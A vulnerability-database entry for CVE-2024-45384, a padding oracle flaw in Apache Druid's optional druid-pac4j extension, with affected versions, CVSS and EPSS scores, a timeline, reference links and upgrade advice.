VDB
CVE-2024-45384
CVE-2024-45384
PUBLISHED
CVSS 5.300000190734863 MEDIUM
Padding Oracle vulnerability in Apache Druid extension, druid-pac4j. This could allow an attacker to manipulate a pac4j session cookie. This issue affects Apache Druid versions 0.18.0 through 30.0.0. Since the druid-pac4j extension is optional and disabled by default, Druid installations not using the druid-pac4j extension are not affected by this vulnerability. While we are not aware of a way to meaningfully exploit this flaw, we nevertheless recommend upgrading to version 30.0.1 or higher which fixes the issue and ensuring you have a strong druid.auth.pac4j.cookiePassphrase as a precaution.
EPSS 0.22% · 44.1th percentile
Risk Scores
CVSS v3.1
5.300000190734863
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
EPSS Score
0.22%
44.1th percentile
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Apache Software Foundation | Apache Druid | 0.18.0 |
| Maven | org.apache.druid.extensions:druid-pac4j | 0.18.0 |
| apache | druid | 0.18.0 |
Timeline
- Sep 17, 2024 CVE Published
- Sep 18, 2024 EPSS Score
- Oct 4, 2024 Coalition ESS Score
- Oct 8, 2024 EPSS Score
- Oct 27, 2024 EPSS Score
- Dec 6, 2024 EPSS Score
- Dec 26, 2024 EPSS Score
- Jan 14, 2025 EPSS Score
- Feb 3, 2025 EPSS Score
- Feb 22, 2025 EPSS Score
- Mar 14, 2025 CVE Updated
- Mar 17, 2025 EPSS Score
References
- https://lists.apache.org/thread/gr94fnp574plb50lsp8jw4smvgv1lbz1 vendor-advisory
- http://www.openwall.com/lists/oss-security/2024/09/17/1 url
- https://nvd.nist.gov/vuln/detail/CVE-2024-45384 advisory
- https://github.com/apache/druid/commit/74cab7a76c99da457c3a883939cc0b03301b8771 url
- https://github.com/apache/druid package
- https://github.com/apache/druid/releases/tag/druid-30.0.1 url